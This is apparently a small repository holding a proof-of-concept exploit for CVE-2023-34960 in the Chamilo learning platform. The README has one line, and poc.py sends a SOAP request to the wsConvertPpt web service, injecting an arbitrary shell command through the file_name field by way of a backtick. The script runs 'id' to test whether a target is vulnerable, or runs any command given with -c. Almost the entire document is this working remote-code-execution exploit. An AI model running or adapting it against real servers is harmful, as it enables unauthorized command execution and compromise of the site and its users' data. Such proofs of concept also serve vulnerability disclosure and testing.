├── README.md
└── poc.py


/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2023-34960
2 | 
3 | CVE-2023-34960 Chamilo PoC
4 | 


--------------------------------------------------------------------------------
/poc.py:
--------------------------------------------------------------------------------
 1 | import argparse
 2 | import requests
 3 | 
 4 | def execute_command(url, command):
 5 |     body = '''<?xml version="1.0" encoding="UTF-8"?>
 6 |     <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">{}`.pptx</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>'''.format(url, command)
 7 | 
 8 |     try:
 9 |         response = requests.post('{}/main/webservices/additional_webservices.php'.format(url), data=body, headers={
10 |             'Content-Type': 'text/xml; charset=utf-8',
11 |         })
12 |     except:
13 |         return False
14 | 
15 |     if response.status_code == 200 and "wsConvertPptResponse" in response.text:
16 |         return True
17 |     else:
18 |         return False
19 | 
20 | parser = argparse.ArgumentParser()
21 | parser.add_argument("-u", "--url", help="Url of your Chamilo", required=True)
22 | parser.add_argument("-c", "--command", help="Command to execute", required=False)
23 | 
24 | args = parser.parse_args()
25 | 
26 | if args.command is None:
27 |     if execute_command(args.url, 'id'):
28 |         print(f"URL vulnerable: {args.url}")
29 |     else:
30 |         print(f"URL not vulnerable: {args.url}")
31 | elif args.command is not None:
32 |     if execute_command(args.url, args.command):
33 |         print(f"Command executed: {args.command}")
34 |     else:
35 |         print(f"An error has occured, url is not vulnerable: {args.url}")
36 | else:
37 |     print("Please specify a command to execute with -c or --command")


--------------------------------------------------------------------------------